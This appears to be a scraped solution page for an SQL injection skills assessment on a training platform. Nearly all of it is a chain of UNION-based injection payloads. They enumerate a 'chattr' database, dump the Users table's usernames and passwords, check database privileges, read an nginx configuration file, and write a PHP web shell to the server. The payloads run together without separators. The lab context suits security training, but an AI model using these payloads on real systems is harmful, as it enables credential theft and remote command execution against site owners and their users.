Skills Assessment - SQL Injection Fundamentals
Scenario

Intercepting HTTPS Traffic with Burp Suite





























Last updated






























Last updated
h4shdumb') UNION SELECT 1,2,TABLE_NAME,TABLE_SCHEMA FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA = 'chattr'-- -h4shdumb') UNION SELECT 1,2,COLUMN_NAME,TABLE_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='Users'-- -h4shdumb') UNION SELECT 1,2,username,password FROM chattr.Users-- -h4shdumb') UNION SELECT 1,2,user(),4-- -h4shdumb') UNION SELECT 1,2,grantee, privilege_type FROM information_schema.user_privileges WHERE grantee="'chattr_dbUser'@'localhost'"-- -h4shdumb') UNION SELECT 1,2,3,LOAD_FILE('/etc/nginx/sites-available/default')-- -h4shdumb') UNION SELECT "","","",'<?=`$_GET[cmd]`?>' INTO OUTFILE '/var/xxx/xxxxxxxxxxx/shell.php-- -